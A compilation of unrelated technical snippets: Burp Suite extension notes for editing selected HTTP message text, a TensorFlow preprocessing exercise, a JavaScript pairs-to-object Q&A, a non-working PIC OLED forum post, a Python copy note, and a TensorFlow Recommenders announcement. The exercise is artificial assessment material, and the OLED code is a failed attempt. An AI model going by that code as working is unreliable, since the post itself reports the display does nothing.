IHttpRequestResponse[] getSelectedMessages() This method can be used to retrieve details of the HTTP requests / responses that were shown or selected by the user when the context menu was invoked.
int[] getSelectionBounds() This method can be used to retrieve the bounds of the user’s selection into the current message, if applicable.
Note that getSelectedMessages returns IHttpRequestResponse objects, so you must determine yourself whether the selected text comes from the request or the response; otherwise the text extracted using the selection bounds from getSelectionBounds may be wrong (in most cases it comes from the former). A string is returned at the end to make it convenient to log information along the way.
"""
@param sourcetype: 0 - Request
1 - Response
@return: String
"""
def getSelectedMessagesString(self):
    if self._servicetype == 0:
        self._tmpService = self._messages[0].getRequest()
    elif self._servicetype == 1:
        self._tmpService = self._messages[0].getResponse()
    self._tmpText = self._tmpService[self._messages_index[0]:self._messages_index[1]].tostring()
    return self._tmpText
When performing the replacement, the whole text is simply replaced:
def replaceText(self, data, rsastatus):
    if self.autoReplaceStuts is True and rsastatus is True:
        new_text = self._tmpService[:self._messages_index[0]] + self._helpers.stringToBytes(data) + self._tmpService[self._messages_index[1]:]
        if self._servicetype == 0:
            self._messages[0].setRequest(new_text)
        elif self._servicetype == 1:
            self._messages[0].setResponse(new_text)
1. Extension entry point and helper interfaces: IBurpExtender, IBurpExtenderCallbacks, IExtensionHelpers, IExtensionStateListener. IBurpExtender is the entry point of a Burp extension; every extension must implement it, and the class must be named BurpExtender. IBurpExtenderCallbacks is the bridge between the IBurpExtender implementation and Burp's other components (Scanner, Intruder, Spider, ...) and communication objects (HttpRequestResponse, HttpService, SessionHandlingAction). IExtensionHelpers and IExtensionStateListener define the extension's helper and state-management operations.
2. UI-related interfaces: IContextMenuFactory, IContextMenuInvocation, ITab, ITextEditor, IMessageEditor, IMenuItemHandler. These define how the extension's UI is displayed and how its actions are handled; they are used mainly for interaction.
3. Burp tool component interfaces: IInterceptedProxyMessage, IIntruderAttack, IIntruderPayloadGenerator, IIntruderPayloadGeneratorFactory, IIntruderPayloadProcessor, IProxyListener, IScanIssue, IScannerCheck, IScannerInsertionPoint, IScannerInsertionPointProvider, IScannerListener, IScanQueueItem, IScopeChangeListener. These are easy to understand: Burp's interface names are self-describing, so from the name alone you can usually guess which tool component an interface applies to.
4. HTTP message handling interfaces: ICookie, IHttpListener, IHttpRequestResponse, IHttpRequestResponsePersisted, IHttpRequestResponseWithMarkers, IHttpService, IRequestInfo, IParameter, IResponseInfo. These are defined around the Cookie, Request, Response and Parameter objects involved in HTTP communication; by processing message headers and bodies, they make it possible to control how HTTP messages flow.
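As a small illustration of categories 1 and 4, here is a minimal hypothetical sketch (separate from the plugin above) of an IHttpListener that logs the URL of every request passing through Burp:
from burp import IBurpExtender, IHttpListener

class BurpExtender(IBurpExtender, IHttpListener):
    def registerExtenderCallbacks(self, callbacks):
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Logger sketch")
        callbacks.registerHttpListener(self)

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        if messageIsRequest:
            # analyzeRequest exposes parsed headers, parameters, URL, etc.
            info = self._helpers.analyzeRequest(messageInfo)
            print("tool %d -> %s" % (toolFlag, info.getUrl()))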
The old version had the user choose the text source; after the update I was too lazy to re-capture the animated GIF :3
|
Now we will create this preprocessing function where we will:
Truncate the reviews, keeping only the first 300 characters of each since you can generally tell whether a review is positive or not in the first sentence or two.
Then we use regular expressions to replace <br/> tags with spaces and to replace any characters other than letters and quotes with spaces.
Finally, the preprocess() function splits the reviews by the spaces, which returns a ragged tensor, and it converts this ragged tensor to a dense tensor, padding all reviews with the padding token <pad> so that they all have the same length.
Note:
tf.strings - Operations for working with string Tensors.
tf.strings.substr(X_batch, 0, 300) - For each string in the input tensor X_batch, it creates a substring starting at index pos (here 0) with a total length of len (here 300). So basically, it returns substrings from a tensor of strings.
tf.strings.regex_replace(X_batch, rb"<br\s*/?>", b" ") - Replaces elements of X_batch matching the regex pattern <br\s*/?> with the rewrite string " " (a single space).
tf.strings.split(X_batch) - Split elements of input X_batch into a RaggedTensor.
X_batch.to_tensor(default_value=b"<pad>") - Converts the RaggedTensor into a tf.Tensor. default_value is the value to set for indices not specified in X_batch. Empty values are assigned default_value(here <pad>).
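To see what these ops do before applying them to the real data, here is a small self-contained sketch with made-up toy strings:
import tensorflow as tf

X_batch = tf.constant([b"Great movie!<br/>Loved it.", b"Awful... just awful"])
X = tf.strings.substr(X_batch, 0, 300)                # truncate to 300 chars
X = tf.strings.regex_replace(X, rb"<br\s*/?>", b" ")  # drop <br/> tags
X = tf.strings.regex_replace(X, b"[^a-zA-Z']", b" ")  # keep letters and quotes
X = tf.strings.split(X)                               # ragged tensor of words
print(X.to_tensor(default_value=b"<pad>"))            # pad to a dense tensor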
Use the following code to preprocess the data as described above:
def preprocess(X_batch, y_batch):
    X_batch = tf.strings.substr(X_batch, 0, 300)
    X_batch = tf.strings.regex_replace(X_batch, rb"<br\s*/?>", b" ")
    X_batch = tf.strings.regex_replace(X_batch, b"[^a-zA-Z']", b" ")
    X_batch = tf.strings.split(X_batch)
    return X_batch.to_tensor(default_value=b"<pad>"), y_batch
Let us now call the preprocess() function on X_batch, y_batch to see what the data looks like after preprocessing:
<< your code comes here >>(X_batch, y_batch)
No hints are available for this assessment
Answer is not available for this assessment
Note - Having trouble with the assessment engine? Follow the steps listed here
|
In Python one can pass the dict¹ constructor a sequence of key-value pairs:
>>> dict([['name', 'Bob'], ['age', 42], ['breakfast', 'eggs']])
{'age': 42, 'name': 'Bob', 'breakfast': 'eggs'}
I can't think of any way to do this sort of thing in JavaScript other than defining my own function for the purpose:
function pairs_to_object(pairs) {
    var ret = {};
    pairs.forEach(function (p) { ret[p[0]] = p[1]; });
    return ret;
}
But I'm a JS noob... Is there anything built-in for this sort of pairs-to-object conversion?
¹ For the purposes of this question, I'm treating Python dicts as Python's counterpart of JS objects, although, of course, the similarity is limited only to the fact that they are both key-value collections.
At the time of writing (2013) JavaScript objects / dictionaries / associative arrays don't have such a constructor natively.
As you said yourself, you can of course build your own function, for instance with a functional approach using the reduce function, as explained in one of the other answers. A classic for loop or the newer forEach would also work, of course. But there isn't anything built-in.
Edit: It's 2019 and now we have Object.fromEntries, which will give you what you need.
You can use the reduce function
x = [[1,2],[3,4],[5,6]];
o = x.reduce(function(prev,curr){prev[curr[0]]=curr[1];return prev;},{})
o is now the equivalent of {1:2, 3:4, 5:6}
If your input array is sparse, you'll want to add an if (curr !== undefined) test around the assignment, but make sure you still return "prev".
If your tuples are something more complex than simple [key,value], you can simply change the way "prev" is assigned to. Eg: prev["key-"+curr[0].toString()]=curr[1]*2;
Lodash's fromPairs function will do this:
const _ = require('lodash')
const kvPairs = [['a', 1], ['b', 2]]
_.fromPairs(kvPairs)
// => { a: 1, b: 2 }
Javascript does not have a native function for converting an array into an object in the way you have described. But, this is because there is no need for it. You have already included in the question an example solution, where you define the function yourself, but that really isn't necessary. As long as you can be sure that the input array is correct, you could even do the conversion with a simple for loop, like so:
var input = [['name', 'Bob'], ['age', 42], ['breakfast', 'eggs']];
var output = {};
for(i in input) output[input[i][0]] = input[i][1];
Which is just about the most basic code imaginable.
Of course, (as mamapitufo points out) it is generally a bad idea to actually use for..in to iterate over an array, because that will also return non-indexes as values of i. Still, the point is that this kind of operation is too simple, and too rarely needed, to justify having a native function.
The python dict is a structure which is not needed in javascript, because the two languages have different approaches to typing, and to design in general, and so what is useful to one is not useful to another. While you could work on using the same methods and structures that you used in python, it might be a better idea to think about how to take advantage of javascript's different way of doing things - maybe you will find that you don't need a dict after all.
Object.fromEntries()
There is a method on the Object object called Object.fromEntries(iterable). The iterator obtained from the iterable has to produce arrays with two elements. The first (index 0) array element becomes the object key and the second the value.
MDN describes this very accurately:
The Object.fromEntries() method takes a list of key-value pairs and returns a new object whose properties are given by those entries. The iterable argument is expected to be an object that implements an @@iterator method, that returns an iterator object, that produces a two element array-like object, whose first element is a value that will be used as a property key, and whose second element is the value to associate with that property key.
You don't even need to know the specifics of an iterable object in order to use the Object.fromEntries() method; you can use it on any iterable of key-value pairs, such as a Map or an array of pairs. Here are examples of both:
// map example:
const map = new Map([ ['hi', 'there'], ['foo', 2] ]);
const objFromMap = Object.fromEntries(map);
console.log(objFromMap); // { hi: "there", foo: 2 }
// array example:
const array = [ ['0', '00'], ['1', '11'], ['2', '22'] ];
const objFromArray = Object.fromEntries(array);
console.log(objFromArray); // { 0: "00", 1: "11", 2: "22" }
At the time of this writing (December 2019) this method is relatively new and not implemented by all browsers. In order to use this method and to ensure that your JS code will run in all browsers, you might have to transpile your code to an earlier version of JS.
Object.fromEntries does the job. It was added to the language with EcmaScript2019.
If you don't have support for that function, you could define it yourself with the following ES2015 code:
Object.fromEntries = arr => Object.assign({}, ...Array.from(arr, ([k, v]) => ({[k]: v}) ));
A nice thing is that this method does the opposite of Object.entries (ES2017), so now you can go back and forth between the object and array representation:
const arr = [['name', 'Bob'], ['age', 42], ['breakfast', 'eggs']];
const obj = Object.fromEntries(arr);
console.log(obj);
// ... and back:
const arr2 = Object.entries(obj);
console.log(arr2); // copy of the original array (omitting duplicate keys)
There is an alternative to plain objects for key/value pairs: Map.
Its constructor accepts the array-of-pairs format:
// Demo:
const arr = [['name', 'Bob'], ['age', 42], ['breakfast', 'eggs']];
const mp = new Map(arr);
// Get one particular value:
console.log(mp.get('age'));
// Get all the keys:
console.log(...mp.keys());
// Get all the values:
console.log(...mp.values());
// Get all the key/value pairs:
console.log(...mp.entries());
If you really need a plain object, then this is not useful, but a Map might present a viable alternative.
|
I am now testing with a 1.3" OLED display, 240 * 240 with an SPI interface (IC: ST7789).
I tried to port Arco's program to a PIC16F887, but it doesn't really work.
The MikroBasic code to test with (still fits in the demo version of the dsPic compiler):
pic basic code:
'==================================================================================================
' Project name: Test_Oled - CONFIG1 : 0x3F7F
' MCU: PIC24FJ256GA106 - CONFIG2 : 0x92BE
' Oscillator: HS, 8.0000 MHz - CONFIG3 : 0xFFFF
'==================================================================================================
program Test_Oled
Dim SSel As sBit At LATD.9 'Display select
D_C As sBit At LATF.5 'Data/Command
const Char6x8 As Byte[570] = ( 'Character table
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ' sp
0x00, 0x00, 0x00, 0x2f, 0x00, 0x00, ' !
0x00, 0x00, 0x07, 0x00, 0x07, 0x00, ' "
0x00, 0x14, 0x7f, 0x14, 0x7f, 0x14, ' #
0x00, 0x24, 0x2a, 0x7f, 0x2a, 0x12, ' $
0x00, 0x62, 0x64, 0x08, 0x13, 0x23, ' %
0x00, 0x36, 0x49, 0x55, 0x22, 0x50, ' &
0x00, 0x00, 0x05, 0x03, 0x00, 0x00, ' '
0x00, 0x00, 0x1c, 0x22, 0x41, 0x00, ' (
0x00, 0x00, 0x41, 0x22, 0x1c, 0x00, ' )
0x00, 0x14, 0x08, 0x3E, 0x08, 0x14, ' *
0x00, 0x08, 0x08, 0x3E, 0x08, 0x08, ' +
0x00, 0x00, 0x00, 0xA0, 0x60, 0x00, ' ,
0x00, 0x08, 0x08, 0x08, 0x08, 0x08, ' -
0x00, 0x00, 0x60, 0x60, 0x00, 0x00, ' .
0x00, 0x20, 0x10, 0x08, 0x04, 0x02, ' /
0x00, 0x3E, 0x51, 0x49, 0x45, 0x3E, ' 0
0x00, 0x00, 0x42, 0x7F, 0x40, 0x00, ' 1
0x00, 0x42, 0x61, 0x51, 0x49, 0x46, ' 2
0x00, 0x21, 0x41, 0x45, 0x4B, 0x31, ' 3
0x00, 0x18, 0x14, 0x12, 0x7F, 0x10, ' 4
0x00, 0x27, 0x45, 0x45, 0x45, 0x39, ' 5
0x00, 0x3C, 0x4A, 0x49, 0x49, 0x30, ' 6
0x00, 0x01, 0x71, 0x09, 0x05, 0x03, ' 7
0x00, 0x36, 0x49, 0x49, 0x49, 0x36, ' 8
0x00, 0x06, 0x49, 0x49, 0x29, 0x1E, ' 9
0x00, 0x00, 0x36, 0x36, 0x00, 0x00, ' :
0x00, 0x00, 0x56, 0x36, 0x00, 0x00, ' ;
0x00, 0x08, 0x14, 0x22, 0x41, 0x00, ' <
0x00, 0x14, 0x14, 0x14, 0x14, 0x14, ' =
0x00, 0x00, 0x41, 0x22, 0x14, 0x08, ' >
0x00, 0x02, 0x01, 0x51, 0x09, 0x06, ' ?
0x00, 0x32, 0x49, 0x59, 0x51, 0x3E, ' @
0x00, 0x7C, 0x12, 0x11, 0x12, 0x7C, ' A
0x00, 0x7F, 0x49, 0x49, 0x49, 0x36, ' B
0x00, 0x3E, 0x41, 0x41, 0x41, 0x22, ' C
0x00, 0x7F, 0x41, 0x41, 0x22, 0x1C, ' D
0x00, 0x7F, 0x49, 0x49, 0x49, 0x41, ' E
0x00, 0x7F, 0x09, 0x09, 0x09, 0x01, ' F
0x00, 0x3E, 0x41, 0x49, 0x49, 0x7A, ' G
0x00, 0x7F, 0x08, 0x08, 0x08, 0x7F, ' H
0x00, 0x00, 0x41, 0x7F, 0x41, 0x00, ' I
0x00, 0x20, 0x40, 0x41, 0x3F, 0x01, ' J
0x00, 0x7F, 0x08, 0x14, 0x22, 0x41, ' K
0x00, 0x7F, 0x40, 0x40, 0x40, 0x40, ' L
0x00, 0x7F, 0x02, 0x0C, 0x02, 0x7F, ' M
0x00, 0x7F, 0x04, 0x08, 0x10, 0x7F, ' N
0x00, 0x3E, 0x41, 0x41, 0x41, 0x3E, ' O
0x00, 0x7F, 0x09, 0x09, 0x09, 0x06, ' P
0x00, 0x3E, 0x41, 0x51, 0x21, 0x5E, ' Q
0x00, 0x7F, 0x09, 0x19, 0x29, 0x46, ' R
0x00, 0x46, 0x49, 0x49, 0x49, 0x31, ' S
0x00, 0x01, 0x01, 0x7F, 0x01, 0x01, ' T
0x00, 0x3F, 0x40, 0x40, 0x40, 0x3F, ' U
0x00, 0x1F, 0x20, 0x40, 0x20, 0x1F, ' V
0x00, 0x3F, 0x40, 0x38, 0x40, 0x3F, ' W
0x00, 0x63, 0x14, 0x08, 0x14, 0x63, ' X
0x00, 0x07, 0x08, 0x70, 0x08, 0x07, ' Y
0x00, 0x61, 0x51, 0x49, 0x45, 0x43, ' Z
0x00, 0x00, 0x7F, 0x41, 0x41, 0x00, ' [
0x00, 0x55, 0x2A, 0x55, 0x2A, 0x55, ' \
0x00, 0x00, 0x41, 0x41, 0x7F, 0x00, ' ]
0x00, 0x04, 0x02, 0x01, 0x02, 0x04, ' ^
0x00, 0x40, 0x40, 0x40, 0x40, 0x40, ' _
0x00, 0x00, 0x01, 0x02, 0x04, 0x00, ' '
0x00, 0x20, 0x54, 0x54, 0x54, 0x78, ' a
0x00, 0x7F, 0x48, 0x44, 0x44, 0x38, ' b
0x00, 0x38, 0x44, 0x44, 0x44, 0x20, ' c
0x00, 0x38, 0x44, 0x44, 0x48, 0x7F, ' d
0x00, 0x38, 0x54, 0x54, 0x54, 0x18, ' e
0x00, 0x08, 0x7E, 0x09, 0x01, 0x02, ' f
0x00, 0x18, 0xA4, 0xA4, 0xA4, 0x7C, ' g
0x00, 0x7F, 0x08, 0x04, 0x04, 0x78, ' h
0x00, 0x00, 0x44, 0x7D, 0x40, 0x00, ' i
0x00, 0x40, 0x80, 0x84, 0x7D, 0x00, ' j
0x00, 0x7F, 0x10, 0x28, 0x44, 0x00, ' k
0x00, 0x00, 0x41, 0x7F, 0x40, 0x00, ' l
0x00, 0x7C, 0x04, 0x18, 0x04, 0x78, ' m
0x00, 0x7C, 0x08, 0x04, 0x04, 0x78, ' n
0x00, 0x38, 0x44, 0x44, 0x44, 0x38, ' o
0x00, 0xFC, 0x24, 0x24, 0x24, 0x18, ' p
0x00, 0x18, 0x24, 0x24, 0x18, 0xFC, ' q
0x00, 0x7C, 0x08, 0x04, 0x04, 0x08, ' r
0x00, 0x48, 0x54, 0x54, 0x54, 0x20, ' s
0x00, 0x04, 0x3F, 0x44, 0x40, 0x20, ' t
0x00, 0x3C, 0x40, 0x40, 0x20, 0x7C, ' u
0x00, 0x1C, 0x20, 0x40, 0x20, 0x1C, ' v
0x00, 0x3C, 0x40, 0x30, 0x40, 0x3C, ' w
0x00, 0x44, 0x28, 0x10, 0x28, 0x44, ' x
0x00, 0x1C, 0xA0, 0xA0, 0xA0, 0x7C, ' y
0x00, 0x44, 0x64, 0x54, 0x4C, 0x44, ' z
0x00, 0x10, 0x6C, 0x82, 0x00, 0x00, ' {
0x00, 0x00, 0x00, 0xFE, 0x00, 0x00, ' |
0x00, 0x00, 0x00, 0x82, 0x6C, 0x10, ' }
0x14, 0x14, 0x14, 0x14, 0x14, 0x14) ' horiz lines
'==================================================================================================
Sub Procedure Init_App() 'Initialize pillbox
'==================================================================================================
Dim lRet As Byte
delay_ms(100)
TRISD = %0000000000001011 '
TRISF = %0000000000000000 '
LATD = %0000001000000010 '
LATF = %0000000000000000 '
Unlock_IOLock()
PPS_Mapping_NoLock( 3,_OUTPUT,_SDO1) 'RP3 (= LATD.10 pin)
PPS_Mapping_NoLock(12,_OUTPUT,_SCK1OUT) 'RP12 (= LATD.11 pin)
Lock_IOLock()
Spi1_Init_Advanced(_SPI_MASTER,
_SPI_8_BIT,
_SPI_PRESCALE_SEC_1,
_SPI_PRESCALE_PRI_16,
_SPI_SS_DISABLE,
_SPI_DATA_SAMPLE_MIDDLE,
_SPI_CLK_IDLE_HIGH,
_SPI_IDLE_2_ACTIVE)
Delay_ms(100)
End Sub
'==================================================================================================
Sub Procedure Lcd_WrCmd(Dim pCmd As Byte) 'Write command to display
'==================================================================================================
D_C = 0
Spi1_Write(pCmd)
End Sub
'==================================================================================================
Sub Procedure Lcd_WrDat(Dim pDat As Byte) 'Write data to display
'==================================================================================================
Dim lCnt As Byte
D_C = 1
Spi1_Write(pDat)
End Sub
'==================================================================================================
Sub Procedure Lcd_SetPos(Dim px, py as Byte) 'Set write position on display
'==================================================================================================
delay_us(1)
Lcd_WrCmd(0xB0 + py)
Lcd_WrCmd((px >> 4) Or 0x10)
Lcd_WrCmd((px And 0x0F))
delay_us(1)
End Sub
'==================================================================================================
Sub Procedure LCD_Fill(Dim pFill As Byte) 'Fill display with character pFill
'==================================================================================================
Dim lx, ly As Byte
For ly = 0 To 8
Lcd_WrCmd(0xB0+ly)
Lcd_WrCmd(0x01)
Lcd_WrCmd(0x10)
For lx = 0 to 131
Lcd_WrDat(pFill)
Next lx
Next ly
End Sub
'==================================================================================================
Sub Procedure Lcd_Char_6x8(Dim px, py, pchar As Byte) 'Write one character
'==================================================================================================
Dim lIndex As Word
Lcd_SetPos(px, py)
lIndex = pChar - 0x20
lIndex = (lIndex << 2) + (lIndex << 1)
Lcd_WrDat(Char6x8[lIndex+0])
Lcd_WrDat(Char6x8[lIndex+1])
Lcd_WrDat(Char6x8[lIndex+2])
Lcd_WrDat(Char6x8[lIndex+3])
Lcd_WrDat(Char6x8[lIndex+4])
Lcd_WrDat(Char6x8[lIndex+5])
End Sub
'==================================================================================================
Sub Procedure Lcd_String_6x8(Dim px, py As Byte, Dim ByRef pDisp As String) ' Write string
'==================================================================================================
Dim lLen, lCnt As Byte
lLen = Length(pDisp)
For lCnt = 0 To (lLen-1)
If px >= 124 Then px = 0 py = py+1 End If
Lcd_Char_6x8(px, py, pDisp[lCnt])
px = px + 6
Next lCnt
End Sub
'==================================================================================================
Main: 'Main program
'==================================================================================================
Init_App() 'Initialize
SSel = 0
delay_ms(500)
SSEL = 1 'Only for 0.96", for 1.3" remove it
delay_ms(500)
Lcd_WrCmd(0xAE) 'Turn OLED panel off
'--------------------------------------------------------------------------
Lcd_WrCmd(0xA8) 'Multiplex ratio set to
Lcd_WrCmd(0x3F) '63
'--------------------------------------------------------------------------
Lcd_WrCmd(0xD3) 'Display offset RAM counter
Lcd_WrCmd(0x00) 'none
'--------------------------------------------------------------------------
Lcd_WrCmd(0x40) 'Start line address
'--------------------------------------------------------------------------
Lcd_WrCmd(0xA1) 'Set segment remap rotation to left
'--------------------------------------------------------------------------
Lcd_WrCmd(0xC8) 'Common output scan direction
'--------------------------------------------------------------------------
Lcd_WrCmd(0xDA) 'Common signals pad
Lcd_WrCmd(0x12) 'value
'--------------------------------------------------------------------------
Lcd_WrCmd(0x81) 'Contrast control
Lcd_WrCmd(0xFF) 'value
'--------------------------------------------------------------------------
Lcd_WrCmd(0xA4)
'--------------------------------------------------------------------------
Lcd_WrCmd(0xA6) 'Normal display
'--------------------------------------------------------------------------
Lcd_WrCmd(0xD5) 'Clock ratio:oscillator frequency
Lcd_WrCmd(0x80) 'oooo:rrrr
'--------------------------------------------------------------------------
Lcd_WrCmd(0x8D)
Lcd_WrCmd(0x14)
'--------------------------------------------------------------------------
Lcd_WrCmd(0x00) 'Set lower column address
Lcd_WrCmd(0x10) 'Set higher column address
'--------------------------------------------------------------------------
Lcd_WrCmd(0xD9) '15 clocks, discharge 1 clock
Lcd_WrCmd(0xF1) 'dddd:pppp
'--------------------------------------------------------------------------
Lcd_WrCmd(0xDB) 'Common output voltage
Lcd_WrCmd(0x40) 'level
'--------------------------------------------------------------------------
Lcd_WrCmd(0x20) 'Addressing mode
Lcd_WrCmd(0x02) 'value
'--------------------------------------------------------------------------
' Lcd_WrCmd(0xA7)
Lcd_Fill(0x00)
Lcd_SetPos(0,0)
'--------------------------------------------------------------------------
Lcd_String_6x8(0,0,"Dit is een test van")
Lcd_String_6x8(0,1,"een 128x64 pixel gra-")
Lcd_String_6x8(0,2,"fisch OLED display.")
Lcd_String_6x8(0,3,"Met 't 6x8 pixel font")
Lcd_String_6x8(0,4,"gaat er heel wat in-")
Lcd_String_6x8(0,5,"formatie op zo'n mini")
Lcd_String_6x8(0,6,"scherm van 1.1x2.2cm")
Lcd_String_6x8(0,7,"(en toch nog scherp!)")
Lcd_WrCmd(0xAF) 'Turn OLED panel on
delay_ms(500)
SSel = 1
While True
Wend
End.
These routines
pic basic code:
Unlock_IOLock()
PPS_Mapping_NoLock( 3,_OUTPUT,_SDO1) 'RP3 (= LATD.10 pin)
PPS_Mapping_NoLock(12,_OUTPUT,_SCK1OUT) 'RP12 (= LATD.11 pin)
Lock_IOLock()
Spi1_Init_Advanced(_SPI_MASTER,
_SPI_8_BIT,
_SPI_PRESCALE_SEC_1,
_SPI_PRESCALE_PRI_16,
_SPI_SS_DISABLE,
_SPI_DATA_SAMPLE_MIDDLE,
_SPI_CLK_IDLE_HIGH,
_SPI_IDLE_2_ACTIVE)
don't run at all anyway (so presumably they're not available on the 887).
I adjusted the ports, but without result (the display does nothing).
|
Python basics: deep copy and shallow copy
Tags: deep copy, shallow copy
"==" compares whether two objects are equal, regardless of whether they point to the same address.
is means that not only are the objects equal, but the memory addresses they point to are also equal (the small-integer object pool is an exception).
Shallow copy: with a = [1, 2, 3]; b = a, after the copy id(a) and id(b) are equal.
Deep copy: the copied content is the same, but the address is different.
import copy
c = copy.deepcopy(a)
When deep-copying a nested list, both the outer list and the nested lists are copied.
With copy.copy, only the outer list is copied; the nested lists are not deep-copied (they are shared).
import copy
a = [1, 2, 3]
b = [4, 5, 6]
c = [a, b]
d = copy.deepcopy(c)
# id(d) != id(c)
print(id(d))
print(id(c))
# The nested lists' addresses also differ.
print(id(d[0]))
print(id(a))
e = copy.copy(c)
# The outer list addresses differ...
print(id(e))
print(id(c))
# ...but the nested list addresses are the same.
print(id(a))
print(id(e[0]))
copy.copy()
For mutable data types it copies only one level; immutable data types are not copied, just referenced directly (same address).
copy.deepcopy()
Everything changes, through and through, inside and out (the addresses differ).
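A minimal sketch showing the practical difference (variable names are arbitrary): after a shallow copy, changes to the nested list show through; after a deep copy, they don't.
import copy

a = [1, 2]
c = [a]

e = copy.copy(c)      # shallow copy: new outer list...
print(e[0] is a)      # True -> ...but the nested list is shared
a.append(3)
print(e)              # [[1, 2, 3]] - the change shows through

d = copy.deepcopy(c)  # deep copy: the nested list is copied too
a.append(4)
print(d)              # [[1, 2, 3]] - unaffected by later changes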
|
September 23, 2020 — Posted by Maciej Kula and James Chen, Google Brain
From recommending movies or restaurants to coordinating fashion accessories and highlighting blog posts and news articles, recommender systems are an important application of machine learning, surfacing new discoveries and helping users find what they love.
At Google, we have spent the last several years exploring new deep learning techniques to provide better recommendations through multi-task learning, reinforcement learning, better user representations and fairness objectives. These and other advancements have allowed us to greatly improve our recommendations.
Today, we're excited to introduce TensorFlow Recommenders (TFRS), an open-source TensorFlow package that makes building, evaluating, and serving sophisticated recommender models easy.
Built with TensorFlow 2.x, TFRS lets you build and evaluate flexible recommendation models, incorporate item, user, and context information freely, and serve the resulting models efficiently.
TFRS is based on TensorFlow 2.x and Keras, making it instantly familiar and user-friendly. It is modular by design (so that you can easily customize individual layers and metrics), but still forms a cohesive whole (so that the individual components work well together). Throughout the design of TFRS, we've emphasized flexibility and ease-of-use: default settings should be sensible; common tasks should be intuitive and straightforward to implement; more complex or custom recommendation tasks should be possible.
TensorFlow Recommenders is open-source and available on Github. Our goal is to make it an evolving platform, flexible enough for conducting academic research and highly scalable for building web-scale recommender systems. We also plan to expand its capabilities for multi-task learning, feature cross modeling, self-supervised learning, and state-of-the-art efficient approximate nearest neighbours computation.
To get a feel for how to use TensorFlow Recommenders, let’s start with a simple example. First, install TFRS using pip:
!pip install tensorflow_recommenders
We can then use the MovieLens dataset to train a simple model for movie recommendations. This dataset contains information on what movies a user watched, and what ratings users gave to the movies they watched.
We will use this dataset to build a model to predict which movies a user watched, and which they didn't. A common and effective pattern for this sort of task is the so-called two-tower model: a neural network with two sub-models that learn representations for queries and candidates separately. The score of a given query-candidate pair is simply the dot product of the outputs of these two towers.
This model architecture is quite flexible. The inputs can be anything: user ids, search queries, or timestamps on the query side; movie titles, descriptions, synopses, lists of starring actors on the candidate side.
In this example, we're going to keep things simple and stick to user ids for the query tower, and movie titles for the candidate tower.
To start with, let's prepare our data. The data is available in TensorFlow Datasets.
import tensorflow as tf
import tensorflow_datasets as tfds
import tensorflow_recommenders as tfrs
# Ratings data.
ratings = tfds.load("movie_lens/100k-ratings", split="train")
# Features of all the available movies.
movies = tfds.load("movie_lens/100k-movies", split="train")
Out of all the features available in the dataset, the most useful are user ids and movie titles. While TFRS can use arbitrarily rich features, let's only use those to keep things simple.
ratings = ratings.map(lambda x: {
"movie_title": x["movie_title"],
"user_id": x["user_id"],
})
movies = movies.map(lambda x: x["movie_title"])
When using only user ids and movie titles, our simple two-tower model is very similar to a typical matrix factorization model. To build it, we're going to need the following: a user tower that turns user ids into user embeddings, a movie tower that turns movie titles into movie embeddings, and an objective with evaluation metrics.
TFRS and Keras provide a lot of the building blocks to make this happen. We can start by creating a model class. In the __init__ method, we set up some hyper-parameters as well as the primary components of the model.
class TwoTowerMovielensModel(tfrs.Model):
  """MovieLens prediction model."""

  def __init__(self):
    # The `__init__` method sets up the model architecture.
    super().__init__()

    # How large the representation vectors are for inputs: larger vectors make
    # for a more expressive model but may cause over-fitting.
    embedding_dim = 32
    num_unique_users = 1000
    num_unique_movies = 1700
    eval_batch_size = 128
The first major component is the user model: a set of layers that describe how raw user features should be transformed into numerical user representations. Here, we use the Keras preprocessing layers to turn user ids into integer indices, then map those into learned embedding vectors:
    # Set up user and movie representations.
    self.user_model = tf.keras.Sequential([
      # We first turn the raw user ids into contiguous integers by looking them
      # up in a vocabulary.
      tf.keras.layers.experimental.preprocessing.StringLookup(
          max_tokens=num_unique_users),
      # We then map the result into embedding vectors.
      tf.keras.layers.Embedding(num_unique_users, embedding_dim)
    ])
The movie model looks similar, translating movie titles into embeddings:
    self.movie_model = tf.keras.Sequential([
      tf.keras.layers.experimental.preprocessing.StringLookup(
          max_tokens=num_unique_movies),
      tf.keras.layers.Embedding(num_unique_movies, embedding_dim)
    ])
Once we have both user and movie models we need to define our objective and its evaluation metrics. In TFRS, we can do this via the Retrieval task (using the in-batch softmax loss):
    # The `Task` object has two purposes: (1) it computes the loss and (2)
    # keeps track of metrics.
    self.task = tfrs.tasks.Retrieval(
      # In this case, our metrics are top-k metrics: given a user and a known
      # watched movie, how highly would the model rank the true movie out of
      # all possible movies?
      metrics=tfrs.metrics.FactorizedTopK(
        candidates=movies.batch(eval_batch_size).map(self.movie_model)
      )
    )
We use the compute_loss method to describe how the model should be trained.
  def compute_loss(self, features, training=False):
    # The `compute_loss` method determines how loss is computed.

    # Compute user and item embeddings.
    user_embeddings = self.user_model(features["user_id"])
    movie_embeddings = self.movie_model(features["movie_title"])

    # Pass them into the task to get the resulting loss. The lower the loss is,
    # the better the model is at telling apart true watches from watches that
    # did not happen in the training data.
    return self.task(user_embeddings, movie_embeddings)
We can fit this model using standard Keras fit calls:
model = TwoTowerMovielensModel()
model.compile(optimizer=tf.keras.optimizers.Adagrad(0.1))
model.fit(ratings.batch(4096), verbose=False)
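Once trained, the usual Keras workflow can also be used to read off the retrieval metrics. A minimal sketch; for simplicity it reuses the training ratings, whereas in practice you would evaluate on a held-out split:
# Evaluate the factorized top-k metrics defined in the Retrieval task.
metrics = model.evaluate(ratings.batch(4096), return_dict=True, verbose=0)
print(metrics)  # e.g. factorized_top_k/top_100_categorical_accuracy, loss, ...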
To sanity-check the model’s recommendations we can use the TFRS BruteForce layer. The BruteForce layer is indexed with precomputed representations of candidates, and allows us to retrieve top movies in response to a query by computing the query-candidate score for all possible candidates:
index = tfrs.layers.ann.BruteForce(model.user_model)
index.index(movies.batch(100).map(model.movie_model), movies)
# Get recommendations.
_, titles = index(tf.constant(["42"]))
print(f"Recommendations for user 42: {titles[0, :3]}")
Of course, the BruteForce layer is only suitable for very small datasets. See our full tutorial for an example of using TFRS with Annoy, an approximate nearest neighbours library.
We hope this gave you a taste of what TensorFlow Recommenders offers. To learn more, check out our tutorials or the API reference. If you'd like to get involved in shaping the future of TensorFlow recommender systems, consider contributing! We will also shortly be announcing a TensorFlow Recommendations Special Interest Group, welcoming collaboration and contributions on topics such as embedding learning and distributed training and serving. Stay tuned!
|
